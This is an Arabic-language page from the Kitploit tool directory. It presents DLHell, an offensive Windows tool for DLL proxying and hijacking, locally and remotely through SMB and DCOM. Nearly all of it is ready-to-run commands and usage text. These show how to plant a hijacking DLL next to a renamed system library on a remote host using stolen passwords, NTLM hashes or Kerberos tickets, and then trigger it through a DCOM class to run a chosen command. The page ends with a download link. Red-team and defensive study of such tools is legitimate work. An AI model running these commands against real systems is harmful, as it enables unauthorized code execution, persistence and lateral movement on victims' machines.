Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DLHell — Local & remote Windows DLL Proxying | Kitploit
أدوات/GitHubGitHub/synacktiv/dlhell
Privilege EscalationPersistence MechanismsExploitationLateral MovementPost-ExploitationPayload Development
GitHubsynacktiv/dlhell

DLHell

Local & remote Windows DLL Proxying

عرض المستودع
17222منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

DLHell

تقوم أداة DLHell بتنفيذ تقنية DLL Proxying عبر DCOM محليًا وعن بُعد على نظام Windows.

التثبيت

الحزم التالية مطلوبة (قد تعتمد على توزيعتك، المثال التالي موجه لتوزيعة Debian 12):

root@kitploit:~
sudo apt install -y g++-mingw-w64-x86-64-win32 binutils-mingw-w64-x86-64

تثبيت تبعيات pip:

root@kitploit:~
pip3 install -r requirements.txt

بدء سريع

يقوم الأمر التالي باختطاف مكتبة netutils.dll على المضيف 10.137.0.48 من ملف القالب template.tpe (مكتبة اختطاف مصدرها C++) والتي تشغّل calc.exe. سيتم وضع كل من ملفي DLL الأصلي والوكيل في مجلد program files/windows nt/accessories/ داخل مشاركة C$ على الهدف البعيد.

يُرجى استخدام صيغة Impacket لخيار -remote-target.

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -remote-lib 'windows/system32/netutils.dll' -remote-target 'program files/windows nt/accessories/test.dll' -target 'domain/user:password@ip'

يمكن أيضًا استخدام مصادقة Kerberos:

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -k -target wks-02.vault-tech.com -progid WordPad.Document.1

عرض قائمة CLSID و ProgIDs المتاحة:

root@kitploit:~
DLHell.py -list

الاستخدام

root@kitploit:~
 ____  _     _   _      _ _
|  _ \| |   | | | | ___| | |
| | | | |   | |_| |/ _ \ | |
| |_| | |___|  _  |  __/ | |
|____/|_____|_| |_|\___|_|_|

DLHell v1.0

usage: DLHell.py [-h] [-local-lib LOCAL_LIB] [-remote-lib REMOTE_LIB] [-local-target LOCAL_TARGET]
                 [-remote-target REMOTE_TARGET] [-target TARGET] [-clsid CLSID] [-progid PROGID] -t T -c C
                 [-u U] [-l] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address]
                 [-target-ip ip address] [-port [destination port]]

DLL Hell - DLL Proxifier/Hijacker

options:
  -h, --help            show this help message and exit
  -local-lib LOCAL_LIB  Path of the remote library on the local system, ex: version.dll
  -remote-lib REMOTE_LIB
                        Path of the library on the remote system, ex: windows/system32/version.dll. WARNING:
                        Will connect using SMB on C$ share. Admin rights needed. Requires -target
  -local-target LOCAL_TARGET
                        The new name of the local output proxyfied library
  -remote-target REMOTE_TARGET
                        The new name of the remote proxyfied library. WARNING: Will connect using SMB on C$
                        share. Admin rights needed. Requires -target
  -target TARGET        [[domain/]username[:password]@]<targetName or address>
  -clsid CLSID          CLSID of DCOM class to activate
  -progid PROGID        ProgID of DCOM class to activate
  -t T, -template T     Template file to use for lib generation
  -c C, -command C      Command to execute using hijacked lib
  -u U, -user U         Name of the user to hijack (used to put DLLs in localappdata folder)
  -l, -list             Lists vulnerable CLSID & ProgID for DCOM Hijacking

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on
                        target parameters. If valid credentials cannot be found, it will use the ones
                        specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN)
                        specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as
                        target. This is useful when target is the NetBIOS name and you cannot resolve it
  -port [destination port]
                        Destination port to connect to SMB Server

DLL Proxying محلي

لإنشاء DLL محلي، استخدم خياري -local-lib (اسم DLL الوكيل) و -local-target (اسم DLL الأصلي بعد إعادة تسميته):

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -local-lib 'lib/netutils.dll' -local-target 'test.dll'

DLL Proxying عن بُعد (يتطلب صلاحيات مسؤول):

لاختطاف DLL عن بُعد، حدد الخيارات -target و -remote-lib (اسم DLL الأصلي على المضيف البعيد) و -local-target (اسم DLL الأصلي بعد إعادة تسميته):

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -remote-lib 'windows/system32/PROPSYS.dll' -remote-target 'windows/test.dll'

DLL Proxying عبر DCOM (يتطلب صلاحيات مسؤول)

يمكن استغلال DLL Proxying عبر DCOM باستخدام خياري -progid و -clsid. تتوفر قائمة CLSIDs و ProgIDs المتاحة عبر الأمر التالي:

root@kitploit:~
DLHell.py -list

يمكنك إضافة عمليات اختطاف جديدة إلى ملف dcom.json الذي يحدد مسارات المكتبات القابلة للاستغلال:

بعد ذلك، يكفي فقط ProgID أو CLSID من أجل:

  • الحصول على DLL الأصلي
  • إنشاء وتجميع مكتبة الاختطاف
  • رفع المكتبات على المضيف البعيد
  • تفعيل فئة DCOM البعيدة

مثال على ProgID WordPad.Document.1:

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -progid WordPad.Document.1

مثال على CLSID 73FDDC80-AEA9-101A-98A7-00AA00374959:

root@kitploit:~
DLHell.py -t template.tpe -c 'calc.exe' -target 'domain/user:password@ip' -clsid 73FDDC80-AEA9-101A-98A7-00AA00374959
تنزيل الأداة